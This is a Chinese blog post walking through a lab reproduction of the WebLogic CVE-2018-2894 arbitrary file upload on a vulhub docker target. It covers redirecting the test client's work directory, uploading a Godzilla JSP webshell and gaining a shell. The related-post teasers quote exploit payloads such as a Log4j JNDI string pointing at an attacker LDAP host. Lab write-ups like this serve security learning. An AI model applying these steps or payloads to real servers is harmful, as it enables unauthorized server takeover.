WebLogic 任意文件上传漏洞 CVE-2018-2894

发表于2026-02-07|更新于2026-03-13|漏洞

|总字数:498|阅读时长:1分钟

影响范围

Oracle WebLogic Server: 12.1.3.0.0
Oracle WebLogic Server: 12.2.1.2.0
Oracle WebLogic Server: 12.2.1.3.0

漏洞类型

任意文件上传

操作系统限制

无

配置要求

端口 7001 对外开放
WebLogic 管理控制台勾选启用测试服务

漏洞利用

文件上传

利用原理

WebLogic 包含一个用于测试 Web 服务的组件 wls-testclient，攻击者无需登录管理控制台直接访问/ws_utc/config.do，该页面允许用户设置工作目录，且缺乏权限校验，攻击者可以将路径篡改到 WebLogic 的 Web 公开目录，修改完路径后，攻击者可以上传恶意 jsp 文件，文件名为系统时间戳_文件名.jsp，该文件可以通过 HTTP 协议直接被外界请求并触发执行，通过木马可以获取服务器控制权

漏洞复现

现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/weblogic/CVE-2018-2894
#拉取镜像
docker-compose up -d

1773401004204

查看管理后台密码

1	docker-compose logs \| grep password

1773401044654

访问 http://靶机 ip:7001/console/login/LoginForm.jsp，并输入密码登录

1773401075195

进入后台

1773401095721

点击 base_domain，接着点击高级

1773401129211

启用 web 服务测试页并保存

1773401433793

访问 http://靶机 ip:7001/ws_utc/config.do，并设置 Work Home Dir

1 2	#手动设置并提交 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

1773401473616

点击安全，点击添加，名字密码随便填，文件选择 jsp 木马文件，可以用哥斯拉生成的 jsp

1773401494892

用 burpsuite 抓取提交的数据包

1773401542369

发送到 Repeater 模块

1773401610671

发送后记录时间戳，即 id

1773401854032

访问 http://靶机 ip:7001/ws_utc/css/config/keystore/ 文件名，文件名字为时间戳_文件名.jsp，可以正常访问

1773401899842

使用哥斯拉连接，url 即上面地址，有效载荷改 JavaDynamicPayload

1773401922542

测试连接为成功，点击添加

1773401951208

进入

1773402000056

成功 getshell

1773402022542

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/07/CVE-2018-2894/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

WebLogic 未授权命令执行漏洞复现 CVE-2020-14882

影响范围 Oracle WebLogic Server: 10.3.6.0.0 Oracle WebLogic Server: 12.1.3.0.0 Oracle WebLogic Server: 12.2.1.3.0 Oracle WebLogic Server: 12.2.1.4.0 Oracle WebLogic Server: 14.1.1.0.0 漏洞类型未授权访问、Java 反序列化操作系统限制无配置要求 7001 端口对外开放漏洞利用命令执行，信息泄露，反弹 shell 利用原理WebLogic 控制台的权限检验逻辑是，如果访问静态资源则直接放行，如果是敏感的管理页面，则检查 Cookie 确认登录状态，攻击者通过构造含静态路径字段的 payload 来绕过 WebLogic 前端拦截器，访问路径为 /console/css/../console.portal，WebLogic 内部引擎会对 url 编码部分进行解码，所以攻击者通过二次 url 编码构造成/console/css/%252e%252e%252fconsole.portal，来绕过 WebL...

WebLogic 远程代码执行漏洞 CVE-2023-21839

影响范围 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞类型未授权访问、JNDI 注入、Java 反序列化操作系统限制无配置要求 7001 端口对外开放漏洞利用命令执行，反弹 shell 利用原理WebLogic 默认开启 T3 协议用于内部分布式通信，T3 协议某些接口没有对调用者进行身份校验，WebLogic 内部中的一个叫 weblogic.deployment.jms.ForeignOpaqueReference 的类是用来引用外部资源的，当把这个类的一个实例发送给 WebLogic 会触发 getReferent () 方法，WebLogic 会自动根据对象内部存储的 remoteJNDIName 发起新的请求，攻击者利用反射机制，强行将 remoteJNDIName 改成恶意的 ldap://攻击机 ip:1389/Exploit。WebLogic 访问 marshalsec（LDAP）时，marshalsec 返回一个引用对象，里面含有编...

Weblogic 命令执行漏洞 CVE-2018-2628

影响范围 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.2.0 WebLogic 12.2.1.3.0 漏洞类型Java 反序列化操作系统限制无配置要求对外开放 7001 漏洞利用命令执行，反弹 shell 利用原理WebLogic 为防范反序列化设置黑名单，sun.rmi.server.UniicasetRef 不在黑名单内，T3 协议是 WebLogic 独有的通信协议，主要用于不同 Java 虚拟机之间传输对象，WebLogic 默认所以端口都支持 T3，攻击者通过 T3 协议把精心构造的 UnicastRef 序列化对象发给 WebLogic，WebLogic 反序列化对象时，会作为 JRMP 客户端主动连接攻击者服务器，攻击者服务器下发恶意 payload，此时 WebLogic，是通过 JRMP 协议进行数据传输，从而绕过最外层的 T3 协议过滤器漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhu...

JBoss 反序列化漏洞 CVE-2017-12149

影响范围 JBoss AS 5.x - JBoss AS 6.1.0.Final 漏洞类型Java 反序列化操作系统限制无配置要求 http-invoker.sar 必须处于部署状态 ReadOnlyAccessFilter 过滤器映射漏洞利用命令执行，反弹 shell 利用原理在 JBoss AS 5.x 或 6.x 中，引入名为 ReadOnlyAccessFilter 过滤器，其默认映射路径为/invoker/readonly，该路径在默认配置下无需身份验证就可访问，该过滤器处理客户端发送的 POST 请求数据时，直接获取请求体的输入流调用 readObject () 方法进行反序列化操作。在还原对象过程中，系统未对传入二进制流进行安全过滤、字节码校验或白名单限制，攻击者可以构造恶意序列化对象，恶意二进制数据通过 HTTP 请求发送到靶机，JBoss 在解析对象时，自动触发对象内部嵌套的恶意代码，执行恶意命令漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vul...

Log4j2 远程命令执行漏洞 CVE-2021-44228

影响范围 Apache Log4j 2.0-beta9 - 2.14.1 漏洞类型 JNDI 注入操作系统限制无配置要求开启端口 8983 和 5005 漏洞利用命令执行，反弹 shell 利用原理Log4j 支持 JNDI 协议的 Lookup 功能，该功能运行开发者在日志中动态插入系统属性（语法格式为 ${prefix:name}），而通过 JNDI，Java 查询可以连接外部资源，攻击者在这里用到了 LDAP 目录服务。攻击者在 HTTP Header 或 URL 参数中发送构造的 payload：${jndi:ldap://攻击机 ip:1389/Exploit}，后端处理这个请求时候会把这个 payload 信息写入日志，Log4j 解析 payload 时，靶机向攻击机请求 LDAP 资源，攻击机返回恶意代码，靶机执行恶意代码完成命令执行漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/log4j/CVE-...

Struts2 远程代码执行漏洞 CVE-2018-11776

影响范围 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 漏洞类型OGNL 表达式注入操作系统限制无配置要求 alwaysSelectFullNamespace 设置为 true package 标签未定义 namespace 或使用了通配符漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts2 将 URL 路径中的 namespace 当作 OGNL 表达式，在重定向跳转时对其进行二次解析，执行敏感命令。Struts2 中的 URL 结构通常为 http://域名/命名空间/Action 名.action，如果攻击者访问不存在的命名空间，且配置了 alwaysSelectFullNamespace = true，那么会将攻击者注入的 payload 提取出来，将动态变量赋值为攻击 payload，OGNL 引擎解析命名空间时候执行了恶意 payload 漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com...

评论

数据加载中